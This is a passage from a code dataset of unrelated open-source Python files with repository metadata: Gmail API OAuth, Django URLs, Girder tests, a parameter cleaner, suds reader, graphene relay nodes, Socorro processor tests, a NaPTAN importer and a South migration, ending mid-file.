from oauth2client.tools import run_flow, argparser
# Parse the command-line arguments (e.g. --noauth_local_webserver)
parser = argparse.ArgumentParser(parents=[argparser])
flags = parser.parse_args()
print type(flags)
# Path to the client_secret.json file downloaded from the Developer Console
CLIENT_SECRET_FILE = 'client_secret.json'
# Check https://developers.google.com/gmail/api/auth/scopes
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/gmail.readonly'
# Location of the credentials storage file
STORAGE = Storage('gmail.storage')
# Start the OAuth flow to retrieve credentials
flow = flow_from_clientsecrets(CLIENT_SECRET_FILE, scope=OAUTH_SCOPE)
http = httplib2.Http()
# Try to retrieve credentials from storage or run the flow to generate them
credentials = STORAGE.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, STORAGE, flags, http=http)
# Authorize the httplib2.Http object with our credentials
http = credentials.authorize(http)
# Build the Gmail service from discovery
gmail_service = build('gmail', 'v1', http=http)
threads = gmail_service.users().threads().list(userId='me').execute()
# Print ID for each thread
if threads['threads']:
for thread in threads['threads']:
print 'Thread ID: %s' % (thread['id'])
break
#pp = pprint.PrettyPrinter(indent=4)
# Retrieve a page of threads
#threads = gmail_service.users().messages().get(userId='me', id='14d3127cf1a769d4').execute()
#print base64.b64decode(threads['payload']['body']['data'])
| RylanGotto/web-dash | websterton/oauth/gmail.py | Python | bsd-3-clause | 1,746 |
"""
Application urlconfig
"""
from __future__ import absolute_import
from django.conf.urls import url
from . import views
urlpatterns = [
url(
r"^(?P<uuid>[0-9a-f-]{36})/$",
views.RateView.as_view(),
name="rate"
),
url(
r"^2/(?P<uuid>[0-9a-f-]{36})/$",
views.Rate2View.as_view(),
name="rate2"
)
]
| RightToResearch/OpenCon-Rating-App | project/rating/urls.py | Python | mit | 365 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import six
import subprocess
import sys
import time
# Need to set the environment variable before importing girder
os.environ['GIRDER_PORT'] = os.environ.get('GIRDER_PORT', '30001') # noqa
from girder.api import access
from girder.api.describe import Description
from girder.api.rest import Resource, RestException
from girder.constants import ROOT_DIR
from girder.utility.progress import ProgressContext
from . import base
from six.moves import range
testServer = None
def setUpModule():
global testServer
mockS3 = False
if 's3' in os.environ['ASSETSTORE_TYPE']:
mockS3 = True
plugins = os.environ.get('ENABLED_PLUGINS', '')
if plugins:
base.enabledPlugins.extend(plugins.split())
testServer = base.startServer(False, mockS3=mockS3)
def tearDownModule():
base.stopServer()
class WebClientTestEndpoints(Resource):
def __init__(self):
self.route('GET', ('progress', ), self.testProgress)
self.route('PUT', ('progress', 'stop'), self.testProgressStop)
self.route('POST', ('file', ), self.uploadFile)
self.stop = False
@access.token
def testProgress(self, params):
test = params.get('test', 'success')
duration = int(params.get('duration', 10))
startTime = time.time()
with ProgressContext(True, user=self.getCurrentUser(),
title='Progress Test', message='Progress Message',
total=duration) as ctx:
for current in range(duration):
if self.stop:
break
ctx.update(current=current)
wait = startTime + current + 1 - time.time()
if wait > 0:
time.sleep(wait)
if test == 'error':
raise RestException('Progress error test.')
testProgress.description = (
Description('Test progress contexts from the web')
.param('test', 'Name of test to run. These include "success" and '
'"failure".', required=False)
.param('duration', 'Duration of the test in seconds', required=False,
dataType='int'))
@access.token
def testProgressStop(self, params):
self.stop = True
testProgressStop.description = (
Description('Halt all progress tests'))
@access.user
def uploadFile(self, params):
"""
Providing this works around a limitation in phantom that makes us
unable to upload binary files, or at least ones that contain certain
byte values. The path parameter should be provided relative to the
root directory of the repository.
"""
self.requireParams(('folderId', 'path'), params)
path = os.path.join(ROOT_DIR, params['path'])
name = os.path.basename(path)
folder = self.model('folder').load(params['folderId'], force=True)
upload = self.model('upload').createUpload(
user=self.getCurrentUser(), name=name, parentType='folder',
parent=folder, size=os.path.getsize(path))
with open(path, 'rb') as fd:
file = self.model('upload').handleChunk(upload, fd)
return file
uploadFile.description = None
class WebClientTestCase(base.TestCase):
def setUp(self):
self.specFile = os.environ['SPEC_FILE']
self.coverageFile = os.environ.get('COVERAGE_FILE', '')
assetstoreType = os.environ['ASSETSTORE_TYPE']
self.webSecurity = os.environ.get('WEB_SECURITY', 'true')
if self.webSecurity != 'false':
self.webSecurity = 'true'
base.TestCase.setUp(self, assetstoreType)
# One of the web client tests uses this db, so make sure it is cleared
# ahead of time. This still allows tests to be run in parallel, since
# nothing should be stored in this db
base.dropGridFSDatabase('girder_webclient_gridfs')
testServer.root.api.v1.webclienttest = WebClientTestEndpoints()
def testWebClientSpec(self):
baseUrl = '/static/built/testEnv.html'
if os.environ.get('BASEURL', ''):
baseUrl = os.environ['BASEURL']
cmd = (
os.path.join(
ROOT_DIR, 'node_modules', 'phantomjs', 'bin', 'phantomjs'),
'--web-security=%s' % self.webSecurity,
os.path.join(ROOT_DIR, 'clients', 'web', 'test', 'specRunner.js'),
'http://localhost:%s%s' % (os.environ['GIRDER_PORT'], baseUrl),
self.specFile,
self.coverageFile,
os.environ.get('JASMINE_TIMEOUT', '')
)
# phantomjs occasionally fails to load javascript files. This appears
# to be a known issue: https://github.com/ariya/phantomjs/issues/10652.
# Retry several times if it looks like this has occurred.
for tries in range(5):
retry = False
task = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
hasJasmine = False
jasmineFinished = False
for line in iter(task.stdout.readline, b''):
if isinstance(line, six.binary_type):
line = line.decode('utf8')
if ('PHANTOM_TIMEOUT' in line or
'error loading source script' in line):
task.kill()
retry = True
elif '__FETCHEMAIL__' in line:
base.mockSmtp.waitForMail()
msg = base.mockSmtp.getMail()
open('phantom_temp_%s.tmp' % os.environ['GIRDER_PORT'],
'wb').write(msg.encode('utf8'))
continue # we don't want to print this
if 'Jasmine' in line:
hasJasmine = True
if 'Testing Finished' in line:
jasmineFinished = True
sys.stdout.write(line)
sys.stdout.flush()
returncode = task.wait()
if not retry and hasJasmine and jasmineFinished:
break
if not hasJasmine:
time.sleep(1)
sys.stderr.write('Retrying test\n')
# If we are retrying, we need to reset the whole test, as the
# databases and other resources are in an unknown state
self.tearDown()
self.setUp()
self.assertEqual(returncode, 0)
| chrismattmann/girder | tests/web_client_test.py | Python | apache-2.0 | 7,277 |
"""
@author ksdme
Contains Utilities
"""
from sure.exceptions import SureTypeError
def u_resolve_fail(throws=False):
"""
decides what to do when
fail signal is returned
"""
if throws is None:
throws = False
if throws:
raise SureTypeError()
else:
return Consts.Fail
class ConstantValue(object):
""" simply used to build refs """
def __str__(self):
return "Const: " + str(self.msg)
def __init__(self, msg):
self.msg = msg
class Consts(object):
"""
Constants,
Enables reference checking
instead of value comparison
"""
# Used only in cases when a test fails
Fail = ConstantValue("Failed")
# simple optional flag
Optional = ConstantValue("Opt")
# Undefined yet
Undefined = ConstantValue("Undefined")
| ksdme/sure | sure/utilities.py | Python | mit | 858 |
from src.platform.tomcat.interfaces import ManagerInterface
class FPrint(ManagerInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "7.0"
| GHubgenius/clusterd | src/platform/tomcat/fingerprints/Tomcat7M.py | Python | mit | 187 |
import logging
import warnings
import collections
from six import add_metaclass
from functools import partial
logger = logging.getLogger(__name__)
class Param(object):
"Describes a single parameter and defines a method for cleaning inputs."
def __init__(self, default=None, allow_list=False, description=None, param_key=None, choices=None, **kwargs):
self.default = default
self.allow_list = allow_list
self.description = description
self.param_key = param_key
self.choices = choices
for key in kwargs:
setattr(self, key, kwargs[key])
def clean(self, value, *args, **kwargs):
if self.choices and value not in self.choices:
raise ValueError('"{0}" not a valid choice'.format(value))
return value
def clean_list(self, values, *args, **kwargs):
return [self.clean(x, *args, **kwargs) for x in values]
class IntParam(Param):
def clean(self, value, *args, **kwargs):
return super(IntParam, self).clean(int(value), *args, **kwargs)
class FloatParam(Param):
def clean(self, value, *args, **kwargs):
return super(FloatParam, self).clean(float(value), *args, **kwargs)
class StrParam(Param):
def __init__(self, *args, **kwargs):
kwargs.setdefault('strip', True)
super(StrParam, self).__init__(*args, **kwargs)
def clean(self, value, *args, **kwargs):
value = str(value)
if self.strip:
value = value.strip()
return super(StrParam, self).clean(value, *args, **kwargs)
class UnicodeParam(StrParam):
def clean(self, value, *args, **kwargs):
value = str(value)
if self.strip:
value = value.strip()
return super(UnicodeParam, self).clean(value, *args, **kwargs)
class BoolParam(Param):
def __init__(self, *args, **kwargs):
kwargs.setdefault('true_values', ('t', 'true', '1', 'yes'))
kwargs.setdefault('false_values', ('f', 'false', '0', 'no'))
super(BoolParam, self).__init__(*args, **kwargs)
def clean(self, value, *args, **kwargs):
value = value.lower()
if value in self.true_values:
value = True
elif value in self.false_values:
value = False
else:
raise ValueError
return super(BoolParam, self).clean(value, *args, **kwargs)
class ParametizerMetaclass(type):
def __new__(cls, name, bases, attrs):
new_cls = type.__new__(cls, name, bases, attrs)
fields = getattr(new_cls, '_fields', {}).copy()
defaults = getattr(new_cls, '_defaults', {}).copy()
if hasattr(new_cls, 'param_defaults'):
warnings.warn('Resource.param_defaults has been deprecated', DeprecationWarning)
defaults.update(new_cls.param_defaults)
for attr, value in attrs.items():
if not isinstance(value, collections.Callable) and not attr.startswith('_'):
# Wrap shorthand definition in param class
if isinstance(value, Param):
field = value
key = field.param_key or attr
value = field.default
else:
key = attr
field = Param(default=value)
clean_method = 'clean_{0}'.format(attr)
# Partially apply the clean method with the field as self
if clean_method in attrs:
field.clean = partial(attrs[clean_method], field)
fields[key] = field
defaults[key] = value
new_cls._fields = fields
new_cls._defaults = defaults
return new_cls
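# A hedged usage sketch (the subclass and the ``request`` object below are
# illustrative assumptions, not part of this module). Param attributes declared
# on a Parametizer subclass are collected by the metaclass and used by clean()
# to coerce raw inputs, falling back to defaults on bad values:
#   class SearchParams(Parametizer):
#       query = StrParam('')
#       page = IntParam(1)
#       per_page = IntParam(10, param_key='limit')
#   cleaned = SearchParams().clean(request.GET)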
@add_metaclass(ParametizerMetaclass)
class Parametizer(object):
def clean(self, params=None, defaults=None):
if params is None:
params = {}
param_defaults = self._defaults.copy()
if defaults is not None:
param_defaults.update(defaults)
cleaned = {}
# Gather both sets of keys since there may be methods defined
# without a default value specified.
keys = set(list(param_defaults.keys()) + list(params.keys()))
for key in keys:
# Add the default value for non-existant keys in params
if key not in params:
cleaned[key] = param_defaults[key]
continue
# Get associated param instance or initialize default one
field = self._fields.get(key, Param())
# Support MultiValueDict (request.GET and POST)
if field.allow_list and hasattr(params, 'getlist'):
value = params.getlist(key)
else:
value = params.get(key)
# If any kind of error occurs while cleaning, revert to
# the default value
try:
if isinstance(value, (list, tuple)):
value = field.clean_list(value)
if not field.allow_list:
value = value[0]
else:
value = field.clean(value)
except Exception as e:
logger.debug('Error cleaning parameter: {0}'.format(e), extra={
'key': key,
'value': value,
})
value = param_defaults.get(key, value)
cleaned[key] = value
return cleaned
| bruth/restlib2 | restlib2/params.py | Python | bsd-2-clause | 5,458 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Contains xml document reader classes.
"""
from suds.sax.parser import Parser
from suds.transport import Request
from suds.cache import Cache, NoCache
from suds.store import DocumentStore
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Reader:
"""
The reader provides integration with cache.
@ivar options: An options object.
@type options: I{Options}
"""
def __init__(self, options):
"""
@param options: An options object.
@type options: I{Options}
"""
self.options = options
self.plugins = PluginContainer(options.plugins)
def mangle(self, name, x):
"""
Mangle the name by hashing the I{name} and appending I{x}.
@return: the mangled name.
"""
h = abs(hash(name))
return '%s-%s' % (h, x)
class DocumentReader(Reader):
"""
The XML document reader provides an integration
between the SAX L{Parser} and the document cache.
"""
def open(self, url):
"""
Open an XML document at the specified I{url}.
        First, an attempt is made to retrieve the document from
the I{object cache}. If not found, it is downloaded and
parsed using the SAX parser. The result is added to the
cache for the next open().
@param url: A document url.
@type url: str.
@return: The specified XML document.
@rtype: I{Document}
"""
cache = self.cache()
id = self.mangle(url, 'document')
d = cache.get(id)
if d is None:
d = self.download(url)
cache.put(id, d)
self.plugins.document.parsed(url=url, document=d.root())
return d
def download(self, url):
"""
        Download the document.
@param url: A document url.
@type url: str.
        @return: A file pointer to the document.
@rtype: file-like
"""
store = DocumentStore()
fp = store.open(url)
if fp is None:
fp = self.options.transport.open(Request(url))
content = fp.read()
fp.close()
ctx = self.plugins.document.loaded(url=url, document=content)
content = ctx.document
sax = Parser()
return sax.parse(string=content)
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{0}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 0:
return self.options.cache
else:
return NoCache()
class DefinitionsReader(Reader):
"""
The WSDL definitions reader provides an integration
between the Definitions and the object cache.
@ivar fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
def __init__(self, options, fn):
"""
@param options: An options object.
@type options: I{Options}
@param fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
Reader.__init__(self, options)
self.fn = fn
def open(self, url):
"""
Open a WSDL at the specified I{url}.
        First, an attempt is made to retrieve the WSDL from
        the I{object cache}. After being unpickled from the cache, the
I{options} attribute is restored.
If not found, it is downloaded and instantiated using the
I{fn} constructor and added to the cache for the next open().
@param url: A WSDL url.
@type url: str.
@return: The WSDL object.
@rtype: I{Definitions}
"""
cache = self.cache()
id = self.mangle(url, 'wsdl')
d = cache.get(id)
if d is None:
d = self.fn(url, self.options)
cache.put(id, d)
else:
d.options = self.options
for imp in d.imports:
imp.imported.options = self.options
return d
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{1}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 1:
return self.options.cache
else:
            return NoCache()
| marcellodesales/svnedge-console | svn-server/lib/suds/reader.py | Python | agpl-3.0 | 5,243 |
'''
Workaround for issue with Python mailbox module mis-reading Usenet
Historical Collection mbox files. Identifies all instances of "from"
that are *not* in the header, changes them to "xFrom," and writes
them to a new mailbox.
'''
batch = []
box = raw_input("What is the mailbox you want to work with? ")
newbox = raw_input("What is the name of the file it should output to? ")
with open(box, 'rb') as original, open(newbox, 'wb') as new:
for line in original:
if "From " in line:
num = line[6]
#Checks to see if is added Google Groups header
if num.isdigit() is True:
#Skips edit if True
batch.append(line)
else:
x = line.replace("From ", "xFrom ")
batch.append(x)
else:
batch.append(line)
for line in batch:
#Writes edited mailbox to new file
new.writelines(line)
print "Editing complete!"
| apdame/usenet-tools | fromedit.py | Python | mit | 992 |
from functools import partial
import six
from graphql_relay import from_global_id, to_global_id
from ..types import ID, Field, Interface, ObjectType
from ..types.interface import InterfaceMeta
def is_node(objecttype):
'''
Check if the given objecttype has Node as an interface
'''
assert issubclass(objecttype, ObjectType), (
'Only ObjectTypes can have a Node interface. Received %s'
) % objecttype
for i in objecttype._meta.interfaces:
if issubclass(i, Node):
return True
return False
def get_default_connection(cls):
from .connection import Connection
assert issubclass(cls, ObjectType), (
'Can only get connection type on implemented Nodes.'
)
class Meta:
node = cls
return type('{}Connection'.format(cls.__name__), (Connection,), {'Meta': Meta})
class GlobalID(Field):
def __init__(self, node, *args, **kwargs):
super(GlobalID, self).__init__(ID, *args, **kwargs)
self.node = node
@staticmethod
def id_resolver(parent_resolver, node, root, args, context, info):
id = parent_resolver(root, args, context, info)
return node.to_global_id(info.parent_type.name, id) # root._meta.name
def get_resolver(self, parent_resolver):
return partial(self.id_resolver, parent_resolver, self.node)
class NodeMeta(InterfaceMeta):
def __new__(cls, name, bases, attrs):
cls = InterfaceMeta.__new__(cls, name, bases, attrs)
cls._meta.fields['id'] = GlobalID(cls, required=True, description='The ID of the object.')
return cls
class NodeField(Field):
def __init__(self, node, type=False, deprecation_reason=None,
name=None, **kwargs):
assert issubclass(node, Node), 'NodeField can only operate in Nodes'
type = type or node
super(NodeField, self).__init__(
type,
description='The ID of the object',
id=ID(required=True),
resolver=node.node_resolver
)
class Node(six.with_metaclass(NodeMeta, Interface)):
'''An object with an ID'''
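    # A hedged usage sketch (Ship, String and get_ship are illustrative
    # assumptions, not part of this module):
    #   class Ship(ObjectType):
    #       class Meta:
    #           interfaces = (Node, )
    #       name = String()
    #       @classmethod
    #       def get_node(cls, id, context, info):
    #           return get_ship(id)
    # get_node_from_global_id() below resolves a global ID to such an object
    # by calling the type's get_node() classmethod.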
@classmethod
def Field(cls, *args, **kwargs): # noqa: N802
return NodeField(cls, *args, **kwargs)
@classmethod
def node_resolver(cls, root, args, context, info):
return cls.get_node_from_global_id(args.get('id'), context, info)
@classmethod
def get_node_from_global_id(cls, global_id, context, info):
try:
_type, _id = cls.from_global_id(global_id)
graphene_type = info.schema.get_type(_type).graphene_type
# We make sure the ObjectType implements the "Node" interface
assert cls in graphene_type._meta.interfaces
except:
return None
get_node = getattr(graphene_type, 'get_node', None)
if get_node:
return get_node(_id, context, info)
@classmethod
def from_global_id(cls, global_id):
return from_global_id(global_id)
@classmethod
def to_global_id(cls, type, id):
return to_global_id(type, id)
@classmethod
def implements(cls, objecttype):
get_connection = getattr(objecttype, 'get_connection', None)
if not get_connection:
get_connection = partial(get_default_connection, objecttype)
objecttype.Connection = get_connection()
| sjhewitt/graphene | graphene/relay/node.py | Python | mit | 3,371 |
import ujson
from socorro.unittest.testbase import TestCase
from nose.tools import eq_, ok_
from mock import Mock, patch
from configman import ConfigurationManager
from configman.dotdict import DotDict
from socorro.processor.processor_2015 import (
Processor2015,
rule_sets_from_string
)
from socorro.lib.util import DotDict as SDotDict
from socorro.lib.transform_rules import TransformRuleSystem
from socorro.processor.support_classifiers import (
BitguardClassifier,
OutOfDateClassifier
)
from socorro.processor.skunk_classifiers import (
SetWindowPos,
UpdateWindowAttributes
)
rule_set_01 = [
[
'ruleset01',
'tag0.tag1',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_all_rules',
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier'
]
]
rule_set_01_str = ujson.dumps(rule_set_01)
rule_set_02 = [
[
'ruleset01',
'tag0.tag1',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_all_rules',
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier'
],
[
'ruleset02',
'tag2.tag3',
'socorro.lib.transform_rules.TransformRuleSystem',
'apply_until_action_succeeds',
'socorro.processor.skunk_classifiers.SetWindowPos, '
'socorro.processor.skunk_classifiers.UpdateWindowAttributes'
],
]
rule_set_02_str = ujson.dumps(rule_set_02)
class TestProcessor2015(TestCase):
def test_rule_sets_from_string_1(self):
rule_set_config = rule_sets_from_string(rule_set_01_str)
rc = rule_set_config.get_required_config()
ok_('ruleset01' in rc)
eq_('tag0.tag1', rc.ruleset01.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset01.rule_system_class.default
)
eq_('apply_all_rules', rc.ruleset01.action.default)
eq_(
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier',
rc.ruleset01.rules_list.default
)
def test_rule_sets_from_string_2(self):
rule_set_config = rule_sets_from_string(rule_set_02_str)
rc = rule_set_config.get_required_config()
ok_('ruleset01' in rc)
eq_('tag0.tag1', rc.ruleset01.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset01.rule_system_class.default
)
eq_('apply_all_rules', rc.ruleset01.action.default)
eq_(
'socorro.processor.support_classifiers.BitguardClassifier, '
'socorro.processor.support_classifiers.OutOfDateClassifier',
rc.ruleset01.rules_list.default
)
ok_('ruleset02' in rc)
eq_('tag2.tag3', rc.ruleset02.tag.default)
eq_(
'socorro.lib.transform_rules.TransformRuleSystem',
rc.ruleset02.rule_system_class.default
)
eq_('apply_until_action_succeeds', rc.ruleset02.action.default)
eq_(
'socorro.processor.skunk_classifiers.SetWindowPos, '
'socorro.processor.skunk_classifiers.UpdateWindowAttributes',
rc.ruleset02.rules_list.default
)
def test_Processor2015_init(self):
cm = ConfigurationManager(
definition_source=Processor2015.get_required_config(),
values_source_list=[{'rule_sets': rule_set_02_str}],
)
config = cm.get_config()
config.logger = Mock()
p = Processor2015(config)
ok_(isinstance(p.rule_system, DotDict))
eq_(len(p.rule_system), 2)
ok_('ruleset01' in p.rule_system)
print p.rule_system.ruleset01
ok_(isinstance(p.rule_system.ruleset01, TransformRuleSystem))
trs = p.rule_system.ruleset01
eq_(trs.act, trs.apply_all_rules)
eq_(len(trs.rules), 2)
ok_(isinstance(trs.rules[0], BitguardClassifier))
ok_(isinstance(trs.rules[1], OutOfDateClassifier))
ok_('ruleset02' in p.rule_system)
ok_(isinstance(p.rule_system.ruleset02, TransformRuleSystem))
trs = p.rule_system.ruleset02
eq_(trs.act, trs.apply_until_action_succeeds)
eq_(len(trs.rules), 2)
ok_(isinstance(trs.rules[0], SetWindowPos))
ok_(isinstance(trs.rules[1], UpdateWindowAttributes))
def test_convert_raw_crash_to_processed_crash_no_rules(self):
cm = ConfigurationManager(
definition_source=Processor2015.get_required_config(),
values_source_list=[{'rule_sets': '[]'}],
)
config = cm.get_config()
config.logger = Mock()
config.processor_name = 'dwight'
p = Processor2015(config)
raw_crash = DotDict()
raw_dumps = {}
with patch('socorro.processor.processor_2015.utc_now') as faked_utcnow:
faked_utcnow.return_value = '2015-01-01T00:00:00'
processed_crash = p.convert_raw_crash_to_processed_crash(
raw_crash,
raw_dumps
)
ok_(processed_crash.success)
eq_(processed_crash.started_datetime, '2015-01-01T00:00:00')
eq_(processed_crash.startedDateTime, '2015-01-01T00:00:00')
eq_(processed_crash.completed_datetime, '2015-01-01T00:00:00')
eq_(processed_crash.completeddatetime, '2015-01-01T00:00:00')
eq_(processed_crash.processor_notes, 'dwight; Processor2015')
| rhelmer/socorro-lib | socorro/unittest/processor/test_processor_2015.py | Python | mpl-2.0 | 5,629 |
"""Import an Irish NaPTAN XML file, obtainable from
https://data.dublinked.ie/dataset/national-public-transport-nodes/resource/6d997756-4dba-40d8-8526-7385735dc345
"""
import warnings
import zipfile
import xml.etree.cElementTree as ET
from django.contrib.gis.geos import Point
from django.core.management.base import BaseCommand
from ...models import Locality, AdminArea, StopPoint
class Command(BaseCommand):
ns = {'naptan': 'http://www.naptan.org.uk/'}
@staticmethod
def add_arguments(parser):
parser.add_argument('filenames', nargs='+', type=str)
def handle_stop(self, element):
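        # Build a StopPoint from a NaPTAN <StopPoint> element: read the
        # descriptor, classification, location, admin area and locality
        # references, then save the stop.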
stop = StopPoint(
atco_code=element.find('naptan:AtcoCode', self.ns).text,
locality_centre=element.find('naptan:Place/naptan:LocalityCentre', self.ns).text == 'true',
active=element.get('Status') == 'active',
)
for subelement in element.find('naptan:Descriptor', self.ns):
tag = subelement.tag[27:]
if tag == 'CommonName':
stop.common_name = subelement.text
elif tag == 'Street':
stop.street = subelement.text
elif tag == 'Indicator':
stop.indicator = subelement.text.lower()
else:
warnings.warn('Stop {} has an unexpected property: {}'.format(stop.atco_code, tag))
stop_classification_element = element.find('naptan:StopClassification', self.ns)
stop_type = stop_classification_element.find('naptan:StopType', self.ns).text
if stop_type != 'class_undefined':
stop.stop_type = stop_type
bus_element = stop_classification_element.find('naptan:OnStreet/naptan:Bus', self.ns)
if bus_element is not None:
stop.bus_stop_type = bus_element.find('naptan:BusStopType', self.ns).text
stop.timing_status = bus_element.find('naptan:TimingStatus', self.ns).text
compass_point_element = bus_element.find(
'naptan:MarkedPoint/naptan:Bearing/naptan:CompassPoint', self.ns
)
if compass_point_element is not None:
stop.bearing = compass_point_element.text
if stop.bus_stop_type == 'type_undefined':
stop.bus_stop_type = ''
place_element = element.find('naptan:Place', self.ns)
location_element = place_element.find('naptan:Location', self.ns)
longitude_element = location_element.find('naptan:Longitude', self.ns)
latitude_element = location_element.find('naptan:Latitude', self.ns)
if longitude_element is None:
warnings.warn('Stop {} has no location'.format(stop.atco_code))
else:
stop.latlong = Point(float(longitude_element.text), float(latitude_element.text))
admin_area_id = element.find('naptan:AdministrativeAreaRef', self.ns).text
if not AdminArea.objects.filter(atco_code=admin_area_id).exists():
AdminArea.objects.create(id=admin_area_id, atco_code=admin_area_id, region_id='NI')
stop.admin_area_id = admin_area_id
locality_element = place_element.find('naptan:NptgLocalityRef', self.ns)
if locality_element is not None:
if not Locality.objects.filter(id=locality_element.text).exists():
Locality.objects.create(id=locality_element.text, admin_area_id=admin_area_id)
stop.locality_id = locality_element.text
stop.save()
def handle_file(self, archive, filename):
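        # Stream-parse the XML file inside the zip archive, handling each
        # StopPoint element as it is read and clearing it afterwards to keep
        # memory usage low.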
with archive.open(filename) as open_file:
iterator = ET.iterparse(open_file)
for _, element in iterator:
tag = element.tag[27:]
if tag == 'StopPoint':
self.handle_stop(element)
element.clear()
def handle(self, *args, **options):
for filename in options['filenames']:
with zipfile.ZipFile(filename) as archive:
for filename in archive.namelist():
self.handle_file(archive, filename)
| stev-0/bustimes.org.uk | busstops/management/commands/import_ie_naptan_xml.py | Python | mpl-2.0 | 4,087 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ConceptNode.max_children'
db.add_column(u'nodemanager_conceptnode', 'max_children',
self.gf('django.db.models.fields.IntegerField')(default=5),
keep_default=False)
# Adding field 'ConceptNode.child_typename'
db.add_column(u'nodemanager_conceptnode', 'child_typename',
self.gf('django.db.models.fields.CharField')(default='unnamed', max_length=50),
keep_default=False)
# Changing field 'ConceptNode.node_type'
db.alter_column(u'nodemanager_conceptnode', 'node_type', self.gf('django.db.models.fields.CharField')(max_length=1))
# Removing M2M table for field admins on 'CITreeInfo'
db.delete_table(db.shorten_name(u'nodemanager_citreeinfo_admins'))
# Removing M2M table for field users on 'CITreeInfo'
db.delete_table(db.shorten_name(u'nodemanager_citreeinfo_users'))
def backwards(self, orm):
# Deleting field 'ConceptNode.max_children'
db.delete_column(u'nodemanager_conceptnode', 'max_children')
# Deleting field 'ConceptNode.child_typename'
db.delete_column(u'nodemanager_conceptnode', 'child_typename')
# Changing field 'ConceptNode.node_type'
db.alter_column(u'nodemanager_conceptnode', 'node_type', self.gf('django.db.models.fields.CharField')(max_length=2))
# Adding M2M table for field admins on 'CITreeInfo'
m2m_table_name = db.shorten_name(u'nodemanager_citreeinfo_admins')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('citreeinfo', models.ForeignKey(orm[u'nodemanager.citreeinfo'], null=False)),
('user', models.ForeignKey(orm[u'authtools.user'], null=False))
))
db.create_unique(m2m_table_name, ['citreeinfo_id', 'user_id'])
# Adding M2M table for field users on 'CITreeInfo'
m2m_table_name = db.shorten_name(u'nodemanager_citreeinfo_users')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('citreeinfo', models.ForeignKey(orm[u'nodemanager.citreeinfo'], null=False)),
('user', models.ForeignKey(orm[u'authtools.user'], null=False))
))
db.create_unique(m2m_table_name, ['citreeinfo_id', 'user_id'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'authtools.user': {
'Meta': {'ordering': "[u'name', u'email']", 'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
